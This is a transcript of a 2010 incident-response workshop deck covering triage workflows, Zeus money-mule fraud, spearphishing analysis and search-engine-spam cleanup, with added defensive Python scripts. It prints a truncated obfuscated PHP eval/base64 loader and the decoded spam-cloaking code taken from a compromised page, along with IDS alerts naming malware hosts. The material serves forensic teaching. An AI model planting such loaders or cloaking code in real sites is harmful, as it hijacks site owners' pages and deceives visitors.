Posted on 19-Dec-2015

Page 1: Network Incident Response Information Security Incident Investigation For 2010 NWACC Security Workshop Craig Schiller, CISSP-ISSMP, ISSAP

Network Incident Response
Information Security Incident Investigation
For 2010 NWACC Security Workshop
Craig Schiller, CISSP-ISSMP, ISSAP

Page 2

Network Forensics & Incident Response

Agenda

Introduction
Incident Response

Page 3

Incident Response

Required by most security policies
Most require a formal Incident Response plan
You should have several means of discovering incidents

Page 4

Incident Response

Who's watching your network?

Page 5

Incident Response

Incident triage flowchart (figure): a reported incident passes down a chain of yes/no checks, and the first category that matches sends it to that category's workflow.

Suspected Disaster -> DR Workflow
Suspected DMCA Violation -> DMCA Workflow
Suspected VIF/Bot -> VIF/Bot Workflow
Investigation Request -> Investigation Workflow
Spearphishing -> Spearphishing Workflow
Compromised Website -> Compromised Website Workflow
PII exposed -> PII Exposed Workflow
Spamming / compromised Account -> Spamming Account Workflow
Preservation Request -> Preservation Request Workflow
Access Request -> Access Request Workflow

Page 6

Incident Detection

Host based: A/V, Anti-Spam, Anti-Spyware; Security logs; RUBotted (Trend Micro)
Enterprise Reporting
User Help Desk Tickets
Abuse notifications
Quasi-Intelligence Organizations
Monitoring & Analysis: Ourmon; Firewall & Router logs; IDS/IPS (host and network); Darknets, Honeypots; DNS; Server & Workstation log analysis; Malware analysis (sandbox); Forensics

Page 7

Investigative Process Model

The slide draws the steps as a staircase; read from the first step to the last they are:

Accusation or Incident Alert
Assessment of Worth
Incident/Crime Scene Protocols
Identification or Seizure
Preservation
Recovery
Harvesting
Reduction (Filtering)
Organization and Search
Analysis
Reporting
Persuasion and Testimony

Case Management Steps
Examination: Assessment, Experiment, Fusion, Correlation, Validation

Page 8

Operation Aching Mules

Page 9

Operation Aching Mules

NYPD detectives entered a Bronx bank in February to investigate a suspicious $44,000 withdrawal. The international investigation began in Omaha in May, when fraudulent ACH payments were made to 46 bank accounts.

The cyber-attacks began in Eastern Europe, sending apparently benign email to computers at small businesses and municipalities in the US.

Clicking on a link downloaded Zeus.

The malware recorded the victims' keystrokes as they logged into their bank accounts online.

Hackers made unauthorized transfers of thousands of dollars at a time to receiving accounts controlled by the co-conspirators.

Once the victim employee begins executing an online banking transaction on behalf of his or her employer, ZeuS invisibly also executes a fraudulent wire transfer, usually for $10,000 or less.

Page 10

Operation Aching Mules

Money Mules

Receiving accounts were set up by a "money mule organization" responsible for retrieving the proceeds of the malware attacks and transporting or transferring the stolen money overseas.

The money mule organization recruited individuals who had entered the United States on student visas, provided them with fake foreign passports, and instructed them to open false-name accounts at U.S. banks.

Once these false-name accounts were successfully opened and had received the stolen funds from the accounts compromised by the malware attacks, the "mules" were instructed to transfer the proceeds to other accounts, most of which were overseas, or to withdraw the proceeds and transport them overseas as smuggled bulk cash.

Page 11

Operation Aching Mules

U.S. authorities charged 92 Russians and Eastern Europeans who allegedly opened U.S. bank accounts expressly to receive cash transferred from hacked online banking accounts.

The defendants charged in Manhattan federal court include managers of and recruiters for the money mule organization, and an individual who obtained the false foreign passports.

19 Eastern Europeans were arrested in the UK. The Ukrainian SBU arrested 5 key subjects of the investigation.

$70M over the last four years.

Page 12

VIF/Bot scenario (VIF/Bot Workflow)

Swimlane diagram (figure); text in diagram order, lane labels as they appear:

Inputs: Botnet Sensors; Security Researcher; Internet; Wormwatch mailing list; McAfee Server; User Reports
Example alerts: 131.252.x.x NERO says bad; 131.252.x.x Acting Bad; 131.252.x.x talking to bad; 38.100.x.x McAfee says bad

Network Team / User Support / Server Support / TAGs:
  Create tracking ticket
  Block network access
  Identify location
  Identify computer or user
  Identify computer or user
  Retrieve computer
  Backup all files
  Perform quick forensics
  Re-image computer
  Identify server or webpage owner
  Identify compromised account
  Locate malware
  Determine attack vector

Security Team:
  Locate infected system
  Identify system owner
  Re-image computer
  Identify computer or user
  Review quick forensics
  Perform deep forensics
  Ensure appropriate resources are working the incident
  Identify useful intelligence markers

Page 13

Incident Detection examples

Reports from Anti-Virus Enterprise server

1. today, Mcafee, 131.252.242.243, pri=hi, JS/Wonka
[**] [1:3111116:1] Mcafee http feed: http://bluebookcarpices.com/ (JS/Wonka) [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2]
05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80
TCP TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF
***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32
TCP Options (3) => NOP NOP TS: 345145726 2079777105

Reports from Intrusion Detection System (IDS)

2. today, zlob, 131.252.243.80, pri=hi
[**] [1:666666:1] zlob dns request [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53
UDP TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73
Len: 45
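Both feed entries are in Snort's alert format, which is what the sensors and the wormwatch list hand around: a signature line `[**] [gid:sid:rev] message [**]`, a classification/priority line, and a flow line `MM/DD-HH:MM:SS.usec src:port -> dst:port` followed by the protocol header. The parser below is an added example written for this transcript, not code from the talk or from Ourmon. It turns each record into a structured alert and lists the local hosts that need a tracking ticket; the local prefix 131.252.0.0/16 is assumed from the addresses on the slide, and the sample records are the two entries above re-wrapped one field group per line.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# The two feed entries from the slide, wrapped one field group per line the
# way Snort writes them in "full" alert mode.
SAMPLE_ALERTS = """\
1. today, Mcafee, 131.252.242.243, pri=hi, JS/Wonka
[**] [1:3111116:1] Mcafee http feed: http://bluebookcarpices.com/ (JS/Wonka) [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2]
05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80
TCP TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF
***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32
TCP Options (3) => NOP NOP TS: 345145726 2079777105

2. today, zlob, 131.252.243.80, pri=hi
[**] [1:666666:1] zlob dns request [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53
UDP TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73
Len: 45
"""

SIG_RE = re.compile(r"\[\*\*\]\s*\[(\d+):(\d+):(\d+)\]\s*(.*?)\s*\[\*\*\]")
CLASS_RE = re.compile(r"\[Classification:\s*(.*?)\]\s*\[Priority:\s*(\d+)\]")
FLOW_RE = re.compile(
    r"(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+"
    r"(\d+\.\d+\.\d+\.\d+):(\d+)\s*->\s*(\d+\.\d+\.\d+\.\d+):(\d+)"
)
PROTO_RE = re.compile(r"\b(TCP|UDP|ICMP)\s+TTL:")  # first token of the IP header line


@dataclass
class Alert:
    gid: int
    sid: int
    rev: int
    msg: str
    classification: str
    priority: int
    timestamp: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: Optional[str]


def parse_alerts(text: str) -> List[Alert]:
    """Split a feed on blank lines and parse every record that carries the
    three mandatory Snort pieces; incomplete records are skipped, not guessed."""
    alerts = []
    for block in re.split(r"\n\s*\n", text.strip()):
        sig, cls, flow = SIG_RE.search(block), CLASS_RE.search(block), FLOW_RE.search(block)
        if not (sig and cls and flow):
            continue
        proto = PROTO_RE.search(block)
        alerts.append(Alert(
            gid=int(sig.group(1)), sid=int(sig.group(2)), rev=int(sig.group(3)),
            msg=sig.group(4),
            classification=cls.group(1), priority=int(cls.group(2)),
            timestamp=flow.group(1),
            src_ip=flow.group(2), src_port=int(flow.group(3)),
            dst_ip=flow.group(4), dst_port=int(flow.group(5)),
            proto=proto.group(1) if proto else None,
        ))
    return alerts


def internal_hosts(alerts: List[Alert], local_net: str) -> List[str]:
    """Addresses inside local_net seen on either side of an alert: the
    machines the VIF/Bot workflow tickets, blocks and retrieves."""
    net = ipaddress.ip_network(local_net)
    hosts = {ip for a in alerts for ip in (a.src_ip, a.dst_ip)
             if ipaddress.ip_address(ip) in net}
    return sorted(hosts)


if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_ALERTS)
    for a in parsed:
        print(f"{a.timestamp} sid={a.sid} prio={a.priority} "
              f"{a.src_ip}:{a.src_port} -> {a.dst_ip}:{a.dst_port}/{a.proto} {a.msg}")
    print("ticket these hosts:", internal_hosts(parsed, "131.252.0.0/16"))
```

The zlob entry is a DNS query to an external resolver on port 53, so the internal host is the source; for the McAfee HTTP feed it is also the source. Keying on "either side inside the local net" keeps the same code useful for alerts where the local machine is the destination (an inbound scan, for instance).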

Page 14

Forensics/Internal Intel Gathering

Quick Forensics: Process Explorer, TCPView, AutoRuns, Process Monitor
Rpier (First Responder tool): automated forensics; consistent information gathered regardless of who runs it
Sleuthing: How did they get in? What does it do? What files are used? When did what happen?
Malware Analysis
More Sleuthing

Page 15

"I checked and I didn't see anything"

Security Event log

Page 16

Forensics/Intel Gathering example

Process Explorer listing from the suspect machine. Two entries named iexplorer.exe, with no description and no company name, are the odd ones out (the real browser binary is iexplore.exe):

Process              PID   CPU    Description                               Company Name
System Idle Process  0     93.36
Interrupts           n/a   1.56   Hardware Interrupts
DPCs                 n/a          Deferred Procedure Calls
System               4     0.39
smss.exe             508          Windows NT Session Manager                Microsoft Corporation
csrss.exe            620          Client Server Runtime Process             Microsoft Corporation
winlogon.exe         884          Windows NT Logon Application              Microsoft Corporation
services.exe         944          Services and Controller app               Microsoft Corporation
svchost.exe          1180         Generic Host Process for Win32 Services   Microsoft Corporation
wmiprvse.exe         3400         WMI                                       Microsoft Corporation
svchost.exe          1252         Generic Host Process for Win32 Services   Microsoft Corporation
svchost.exe          1312         Generic Host Process for
PSXSS.EXE            896          Interix Subsystem Server                  Microsoft Corporation
init                 2156         Interix Utility                           Microsoft Corporation
inetd                2432         Interix Utility                           Microsoft Corporation
iexplorer.exe        3560
explorer.exe         8564         Windows Explorer                          Microsoft Corporation
ccApp.exe            9208         Symantec User Session                     Symantec Corporation
VPTray.exe           8636         Symantec AntiVirus                        Symantec Corporation
VPC32.exe            9524         Symantec AntiVirus                        Symantec Corporation
iexplorer.exe        6712
sqlmangr.exe         9904         SQL Server Service Manager                Microsoft Corporation
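Eyeballing a process list for one odd name works on one machine; the same two signals can be checked mechanically on every quick-forensics export. The script below is an added example for this transcript, not a tool from the talk: it reads a tab-separated Process Explorer export and flags rows with no company name and rows whose image name is a near-miss of a known Windows binary. The baseline set of names and the sample listing (modelled on the slide, with an extra scvhost.exe row added to show a transposition lookalike) are both constructed for the example.

```python
import csv
import io
from dataclasses import dataclass, field
from typing import List

# Baseline of Windows image names malware likes to imitate. Assumption: a real
# deployment builds a fuller list from known-good machines.
KNOWN_SYSTEM_BINARIES = {
    "smss.exe", "csrss.exe", "winlogon.exe", "services.exe", "lsass.exe",
    "svchost.exe", "explorer.exe", "iexplore.exe", "spoolsv.exe", "wmiprvse.exe",
}

# Constructed tab-separated export modelled on the listing above; the
# scvhost.exe row is added to show a transposition lookalike with a plausible company.
SAMPLE_LISTING = """\
Process\tPID\tCPU\tDescription\tCompany Name
smss.exe\t508\t\tWindows NT Session Manager\tMicrosoft Corporation
svchost.exe\t1180\t\tGeneric Host Process for Win32 Services\tMicrosoft Corporation
iexplorer.exe\t3560\t\t\t
explorer.exe\t8564\t\tWindows Explorer\tMicrosoft Corporation
VPTray.exe\t8636\t\tSymantec AntiVirus\tSymantec Corporation
scvhost.exe\t2044\t\tGeneric Host Process for Win32 Services\tMicrosoft Corporation
iexplorer.exe\t6712\t\t\t
sqlmangr.exe\t9904\t\tSQL Server Service Manager\tMicrosoft Corporation
"""


def levenshtein(a: str, b: str) -> int:
    """Edit distance, computed one DP row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


@dataclass
class Finding:
    process: str
    pid: int
    reasons: List[str] = field(default_factory=list)


def triage_processes(listing: str, max_distance: int = 2) -> List[Finding]:
    """Flag rows with an empty company name and rows whose image name is within
    max_distance edits of a known system binary without being one."""
    findings = []
    for row in csv.DictReader(io.StringIO(listing), delimiter="\t"):
        name = row["Process"].strip()
        lname = name.lower()
        reasons = []
        if not row["Company Name"].strip():
            reasons.append("no company name in version info")
        if lname not in KNOWN_SYSTEM_BINARIES:
            near = sorted(k for k in KNOWN_SYSTEM_BINARIES
                          if levenshtein(lname, k) <= max_distance)
            if near:
                reasons.append("lookalike of " + ", ".join(near))
        if reasons:
            findings.append(Finding(name, int(row["PID"]), reasons))
    return findings


if __name__ == "__main__":
    for f in triage_processes(SAMPLE_LISTING):
        print(f"{f.process} (pid {f.pid}): {'; '.join(f.reasons)}")
```

Both signals are weak on their own: the company name comes from the file's version resource, which an attacker can fill in, and a distance threshold of 2 will occasionally flag a legitimate third-party binary. They are a triage aid for deciding which image to pull strings from and submit to the sandbox, not a verdict.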

Page 17

Forensics/Intel Gathering example

Page 18

Forensics/Intel Gathering example

Page 19

Forensics/Intel Gathering example

Strings in the file iexplorer.exe

Strings in memory

Page 20

Analyzing the Malware

CWSandbox Analysis

Page 21

Carsten Willems' CWSandbox

VMware
XP Pro
Ubuntu

Page 22

The Future

Page 23

Movie

BUM60.MOV

Page 24

Spearphishing scenario

Create tracking ticket
Identify computer or user
Review quick forensics and perform deep forensics
Ensure appropriate resources are working the incident
Identify useful intelligence markers
Perform anti-spearphishing tasks:
  Contact anti-spearphishing vendor
  Contact phishing site host and ISP
  Contact aggregating sites
External reporting

Page 25

Spearphishing investigative model

Table: incident response phase, investigation method step, and what that step means in the spearphishing response scenario.

Preparation
  Accusation or Incident Alert: Notify. Make it easy for detection and notification to occur.
  Assessment of Worth: Prioritize this incident in relation to other work of the organization.
  Incident/Crime Scene Protocols: Begin the process of ensuring the admissibility of evidence.

Detection
  Identification or Seizure: Using the protocols established above, ensure that all potential network evidence is identified and documented.

Analysis
  Preservation: Document the incident and open an incident ticket. Notify wormwatch.
  Recovery: Identify and collect potential evidence from network and enterprise systems.
  Harvesting: Use experience to examine the collected data and identify class characteristics that might contribute to the investigation.
  Reduction: Use the output of the Harvesting step to extract phishing-site-specific network traffic entries from evidence sources (firewall logs, tcpdump, Ourmon logs, NetFlow data, etc.).
  Organization and Search: Use consistent naming schemes and folder hierarchies. Make it easier for the investigator to find and identify data during the Analysis step. Enable repeatability and accuracy of subsequent analysis.
  Analysis: Analyze the timeline (temporal analysis), the relationships between the phisher's IP addresses and other attacks (relational analysis), and conditions or data that might tend to make the incident possible or impossible (functional analysis). Analyze the IP addresses to identify the source. Determine why this victim was selected (victimology).

Page 26

Spearphishing investigative model (continued)

Containment (no corresponding investigation step): Triage, stop the bleeding. Identify the compromised account owner. Keep future attempts using the attack vector from reaching their intended target. Feed the attacker's IP addresses to local detection software and networking. Contact the related ISPs or host organizations.

Eradication (no corresponding step): Search mail systems for other compromised accounts. Locate and re-image any system that downloaded malware.

Recovery (no corresponding step): Recover the compromised account. Prevent the attackers from continuing to use the compromised accounts. Return the user's system to normal operation. Educate users on spearphisher techniques and how to recognize them.

Post-Incident Activity
  Reporting: Contact law enforcement. Feed the attacker's IP addresses to intelligence aggregation organizations.
  Persuasion and Testimony: Prepare presentations and brief executive management. Give awareness presentations to relevant stakeholders.

Page 27

Spearphishing email

Page 28

Recover useful information

You can extract the following information from the spearphishing email:
The From and Reply-To email addresses
The subject line and Message-ID
The URL of the phishing site
The originating IP address
The domain of the originating IP address
The domain of the phishing site

Page 29

Spearphishing email

Return-Path: <[email protected]>
Received: from murder (beli.oit.pdx.edu [131.252.122.1])
    by backend03.psumail.pdx.edu (Cyrus v2.2.12) with LMTPSA (version=TLSv1/SSLv3 cipher=AES256-SHA bits=256/256 verify=YES); Tue, 13 Jul 2010 09:40:08 -0700
X-Sieve: CMU Sieve 2.2
Received: from beli.oit.pdx.edu ([unix socket])
    by psumail.pdx.edu (Cyrus v2.2.13) with LMTPA; Tue, 13 Jul 2010 09:40:08 -0700
Received: from nithog.oit.pdx.edu (nithog.oit.pdx.edu [131.252.120.55])
    by beli.oit.pdx.edu (8.14.1+/8.13.1) with ESMTP id o6DGe8L5014251
    for <[email protected]>; Tue, 13 Jul 2010 09:40:08 -0700
Received: from gtwy.camden.k12.ga.us (mail.camden.k12.ga.us [168.11.97.73])
    by nithog.oit.pdx.edu (8.14.1+/8.13.1) with ESMTP id o6DGe6Ow021644
    for <[email protected]>; Tue, 13 Jul 2010 09:40:07 -0700
X-Authentication-Warning: nithog.oit.pdx.edu: Host mail.camden.k12.ga.us [168.11.97.73] claimed to be gtwy.camden.k12.ga.us
Received: from gtwy.camden.k12.ga.us (unknown [127.0.0.1])
    by IMSA (Postfix) with ESMTP id 62BD211014E; Tue, 13 Jul 2010 12:40:05 -0400 (EDT)
Received: from exchange2.camden.k12.ga.us (unknown [168.11.97.41])
    by gtwy.camden.k12.ga.us (Postfix) with ESMTP id DF3E711014B; Tue, 13 Jul 2010 12:40:04 -0400 (EDT)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: Mailbox Quota
Date: Tue, 13 Jul 2010 12:40:03 -0400
Message-ID: <85A63B83E0776A4E8D5416E0A7E805490BDBAA2D@exchange2.camden.k12.ga.us>
From: "Sandra J. Deloach" <[email protected]>
To: undisclosed-recipients:;

Reading the Received chain from the bottom up: the message was injected at exchange2.camden.k12.ga.us (168.11.97.41), relayed through the sender's own gateway, and handed to PSU's nithog.oit.pdx.edu from 168.11.97.73. The X-Authentication-Warning records that this host announced itself (HELO) as gtwy.camden.k12.ga.us while its reverse DNS was mail.camden.k12.ga.us. Only the Received lines stamped by your own servers can be trusted; every line below the handoff was written by systems the sender controls and could have been forged.
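The header walk on pages 28 and 29 is mechanical enough to script. The following is an added example for this transcript, not code from the talk: it parses a raw message with the standard library, walks the Received headers from our side outward to find the first hop one of our own servers accepted from outside our domain (the originating IP to act on), notes whether that hop's HELO name matched its reverse DNS, and pulls the From, Reply-To, Subject, Message-ID and phishing URLs. The sample message is constructed to mirror the structure above; its host names, addresses and IPs are documentation placeholders, and `our_domain` is whatever your own mail hosts end in.

```python
import re
from email.parser import Parser
from typing import Dict, List, Optional

# Constructed message modelled on the headers above. Hosts, addresses and IPs
# are documentation placeholders, not the real ones.
SAMPLE_MESSAGE = """\
Return-Path: <quota-admin@sender.example>
Received: from mx1.victim.example (mx1.victim.example [192.0.2.10])
\tby mailstore.victim.example with LMTP; Tue, 13 Jul 2010 09:40:08 -0700
Received: from gtwy.sender.example (mail.sender.example [198.51.100.73])
\tby mx1.victim.example (8.14.1) with ESMTP id o6DGe6Ow021644
\tfor <someone@victim.example>; Tue, 13 Jul 2010 09:40:07 -0700
X-Authentication-Warning: mx1.victim.example: Host mail.sender.example [198.51.100.73] claimed to be gtwy.sender.example
Received: from exchange2.sender.example (unknown [198.51.100.41])
\tby gtwy.sender.example (Postfix) with ESMTP id DF3E711014B;
\tTue, 13 Jul 2010 12:40:04 -0400 (EDT)
Subject: Mailbox Quota
Message-ID: <85A63B83E0776A4E8D5416E0A7E805490BDBAA2D@exchange2.sender.example>
From: "Helpdesk" <quota-admin@sender.example>
Reply-To: <collect@phisher.example>
To: undisclosed-recipients:;

Your mailbox is over quota. Confirm your account at http://phisher.example/webmail/login.php
"""

# "from HELO (rdns [ip]) by HOST"; rdns is optional because Postfix writes "unknown".
RECV_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[0-9A-Fa-f.:]+)\]\)\s+by\s+(?P<by>\S+)"
)
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def parse_received(raw_message: str) -> List[Dict[str, Optional[str]]]:
    """Received hops in header order: the first was added last (nearest to us),
    the last is the earliest, claimed, hop. Hops without an IP are skipped."""
    msg = Parser().parsestr(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        m = RECV_RE.search(" ".join(value.split()))  # unfold continuation lines
        if m:
            hops.append(m.groupdict())
    return hops


def originating_hop(hops, our_domain: str):
    """The first hop one of our own servers received from outside our_domain.
    Everything after it in the list was stamped by the sender's infrastructure
    and can be forged; this hop's IP is the one to block and report."""
    for hop in hops:
        inside = hop["by"].endswith(our_domain)
        peer_ours = (hop["rdns"] or "").endswith(our_domain)
        if inside and not peer_ours:
            return hop
    return None


def extract_indicators(raw_message: str, our_domain: str) -> Dict[str, object]:
    """The fields page 28 lists: from, reply-to, subject, message id,
    originating IP and domain, phishing URLs and their domains."""
    msg = Parser().parsestr(raw_message)
    hops = parse_received(raw_message)
    origin = originating_hop(hops, our_domain)
    body = msg.get_payload(decode=True) or b""
    urls = sorted(set(URL_RE.findall(body.decode("utf-8", "replace"))))
    return {
        "from": msg.get("From"),
        "reply_to": msg.get("Reply-To"),
        "subject": msg.get("Subject"),
        "message_id": msg.get("Message-ID"),
        "originating_ip": origin["ip"] if origin else None,
        "originating_domain": origin["rdns"] if origin else None,
        "helo_mismatch": bool(origin) and origin["helo"] != origin["rdns"],
        "claimed_origin_ip": hops[-1]["ip"] if hops else None,
        "urls": urls,
        "phishing_domains": sorted({u.split("/")[2] for u in urls}),
    }


if __name__ == "__main__":
    for key, value in extract_indicators(SAMPLE_MESSAGE, "victim.example").items():
        print(f"{key:20} {value}")
```

`claimed_origin_ip` is reported separately from `originating_ip` on purpose: the bottom hop is useful intelligence (here it points at the sender's internal Exchange server, consistent with a compromised account rather than a spoofed envelope), but only the handoff IP was observed by a machine you control.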

Page 30

Limit the damage

Block outbound traffic to the phishing site's IP address
Block by web filtering
DNS "cache poisoning" (a sinkhole on your own resolver): your DNS server can intercept and rewrite the answers for either domain (the originating domain and the phishing site's domain) for every system that uses it. By replacing the real answer with an address in your darknet and instrumenting a system at that address, you get a warning every time someone on your network responds to the attack. Clients that use an outside resolver or follow a raw-IP link bypass the sinkhole, which is why the IP block above stays in place as well.

Page 31

Spearphish Campaign spreadsheet

Page 32

Phishing website

Page 33

Gathering intelligence

100713-spearphishing-passwords.saz (Fiddler session archive)

Page 34

Gathering intelligence

Page 35

Gather Intelligence

Extracted passwords

Page 36

Compromised Accounts (spammers)

Swimlane diagram (figure); text in diagram order, lane labels as they appear:

Inputs: E-mail server; Internet; User interaction

Server Support:
  Maintain list of bad actors
  Monitor logins for bad actors
  Monitor sent-mail thresholds
  Search for phish responders
  Disable accounts

User Support:
  Look up contact info
  Contact user
  Change password
  Clean signatures
  Request account re-enable

Security Team:
  Notify Server Support about phishing responders
  Confirm user account is supposed to be active
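Two of the Server Support steps above, "monitor logins for bad actors" and "monitor sent-mail thresholds", are the detections that catch a phished account before the abuse reports arrive. The script below is an added example for this transcript, not code from the talk: it runs both checks over normalized login/send events. The event format (one `LOGIN` or `SENT` line per event) and the sample log are constructed for the example; a real Cyrus, Postfix or Exchange log needs its own parser in front of these functions, and the bad-actor IP set is whatever the spearphishing workflow harvested.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set

# Constructed, normalized mail-server events (one LOGIN or SENT per line).
SAMPLE_MAIL_LOG = """\
2010-07-13T10:02:11 LOGIN user=jdoe ip=198.51.100.23
2010-07-13T10:02:14 LOGIN user=asmith ip=131.252.50.9
2010-07-13T10:05:00 SENT user=asmith rcpts=3
2010-07-13T10:06:31 SENT user=jdoe rcpts=200
2010-07-13T10:09:02 SENT user=jdoe rcpts=250
2010-07-13T10:14:45 SENT user=jdoe rcpts=250
2010-07-13T10:40:09 LOGIN user=bchen ip=198.51.100.23
2010-07-13T11:20:00 SENT user=jdoe rcpts=4
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>LOGIN|SENT) user=(?P<user>\S+)"
    r"(?: ip=(?P<ip>\S+))?(?: rcpts=(?P<rcpts>\d+))?$"
)


def logins_from_bad_actors(log: str, bad_ips: Set[str]) -> Dict[str, List[str]]:
    """Accounts that authenticated from an address on the bad-actor list,
    e.g. the phisher IPs harvested in the spearphishing workflow."""
    hits: Dict[str, List[str]] = defaultdict(list)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m and m["event"] == "LOGIN" and m["ip"] in bad_ips:
            hits[m["user"]].append(m["ip"])
    return dict(hits)


def accounts_over_send_threshold(log: str, max_rcpts: int,
                                 window_minutes: int = 60) -> Dict[str, int]:
    """Accounts whose recipient count inside any sliding window of
    window_minutes exceeds max_rcpts; returns the peak count per offender."""
    window = timedelta(minutes=window_minutes)
    sends: Dict[str, List] = defaultdict(list)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m and m["event"] == "SENT":
            sends[m["user"]].append((datetime.fromisoformat(m["ts"]), int(m["rcpts"])))
    offenders = {}
    for user, events in sends.items():
        events.sort()
        start, total, peak = 0, 0, 0
        for ts, n in events:
            total += n
            while ts - events[start][0] > window:  # drop events that fell out of the window
                total -= events[start][1]
                start += 1
            peak = max(peak, total)
        if peak > max_rcpts:
            offenders[user] = peak
    return offenders


if __name__ == "__main__":
    print("logins from bad actors:", logins_from_bad_actors(SAMPLE_MAIL_LOG, {"198.51.100.23"}))
    print("accounts over threshold:", accounts_over_send_threshold(SAMPLE_MAIL_LOG, 500))
```

A sliding window is used rather than per-hour buckets so that a burst straddling the top of the hour is not split in two. The threshold itself has to be tuned per site: list servers and departmental mailers legitimately exceed what a personal account ever sends, so exempt them explicitly rather than raising the limit for everyone.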

Page 37

Search Engine Spam: a victimless crime?

Is it really victimless?

It cheats the poor and technology-weak out of their hard-earned money.

Operators of search engine spam sites are linked to child porn.

Reputational damage and DoS.

Page 38

Damage to Your University's Reputation

Page 39

Search Engine Spam

Swimlane diagram (figure); text in diagram order, lane labels as they appear:

Inputs: Internet; Google Alerts; External email notice; Wormwatch mailing list

Security Team:
  Process Google Alert
  Analyze compromised web site
  Create tracking ticket
  ID website owner/developer
  Analyze malware

Network Team / Server Support / TAGs:
  Block network access
  Send malware to Security Team
  Mitigate vulnerability
  Shut down webpage access
  Collect and analyze logs
  Clear the Google cache

Website Owner:
  Locate infected system
  Identify system owner
  Mitigate vulnerability
  Restore webpage
  Work with Server Support
  Limit damage
  Find root cause
  Mitigate vulnerability
  Restore webpage and ask to restore access
  Keep Security Team informed on status

Further steps shown (lane label not recoverable from the extracted text):
  Identify server or webpage owner
  Identify compromised account
  Locate malware
  Determine attack vector
  Determine exploited vulnerability
  Ensure appropriate resources are working the incident
  Identify useful intelligence markers
  Contact ISP and/or website owner and linked pages
  Share with aggregators

Page 40

Search Engine Spam & Clicks 4 Hire

Use Google to search your own site for Clicks-4-Hire relays and search engine spam, for example:

site:yoursite.com -pdf -ppt -doc phentermine OR viagra OR cialis OR vioxx OR oxycontin OR levitra OR ambien OR xanax OR paxil OR "slot-machine" OR "texas-holdem"

Page 41

Google site search results

Page 42

Google Alerts

[email protected]

Page 43

Google Alerts Results

Page 44

An owned webpage

Page 45

Browser Intelligence gathering

Page 46

Links to this web page

Page 47

Fiddler sleuthing

Page 48

Base64 Encoding

The loader found on the owned page (the slide cuts the string off):

<?php
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdF9saXN0ID0gYXJyYXkoIjguNi40OCIsIjYyLjE3Mi4xOTkiLCI2Mi4yNy41OSIsIjYzLjE2My4xMDIiLCI2NC4xNTcuMTM3IiwiNjQuMTU3LjEzOCIsIjY0LjIzMy4xNzMiLCI2NC42OC44MCIsIjY0LjY4LjgxIiwiNjQuNjguODIiLCI2NC42OC44MyIsIjY0LjY4Ljg0IiwiNjQuNjguOD

Decoding the visible prefix gives the start of the real script: error_reporting(0); followed by $bot_list = array("8.6.48","62.172.199","62.27.59","63.163.102","64.157.137","64.157.138","64.233.173","64.68.80", ... The script first silences PHP error output, then builds a list of IP prefixes ($bot_list) to compare visitors against before deciding what to serve them.

Page 49

Base64 Encoding

Page 50

Base64 Encoding

The decoded cloaking logic (the slide cuts it off after the inner if; the braces below are closed only so the fragment parses, and the missing body is left empty rather than guessed):

<?php
// Only visitors who arrive from a search engine get the spam; everyone else,
// including the site owner browsing directly, sees the normal page.
if (preg_match('/live|msn|yahoo|google|ask|aol/', $_SERVER["HTTP_REFERER"])) {
    $tabs = array ('viagra','cialis','levitra','propecia','prozac','xenical','soma','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia','phentermine','adipex','tramadol','ultram','xanax','valium','ambien','ativan','vicodin','hoodia','acomplia');
    $niche = 'unknown';
    // Pick the "niche" from the drug name in the referring search query.
    foreach ($tabs as $tab) {
        if (preg_match("/$tab/", $_SERVER["HTTP_REFERER"])) {
            // remainder not on the slide
        }
    }
}

Page 51

302 Error hijacking

If the source of the highlighted URL differs from the source you get when you browse directly to the same page, then the spammers may be hijacking your Google result.

Google hijacking presents a serious challenge to your eradication efforts, as Google has not provided a process for dealing with these incidents.

See http://www.loriswebs.com/find-hijacker.html for more information about 302 errors and Google hijacking. The same site has directions for reporting 302-redirect hijacking at http://www.loriswebs.com/report-302redirect.html.

That process attempts to address the hijacking by approaching the ISP or hosting service and reporting the incident as a terms-of-service violation. It is the best you can do until Google addresses the issue of decoupling sites that should not be able to influence the search engine results about your sites.

Page 52

Search Engine Spam removal

1. Info-Security/Website owner monitors Google Alerts.
2. Info-Security/Webserver Administration locates the web server administrator and creates a ticket in the appropriate help desk ticket queue. The organizational communications office should be cc'd on the ticket.
3. The Unix/other webserver administrator resets permissions so files are no longer www/world-writable, then captures and deletes the offending files.
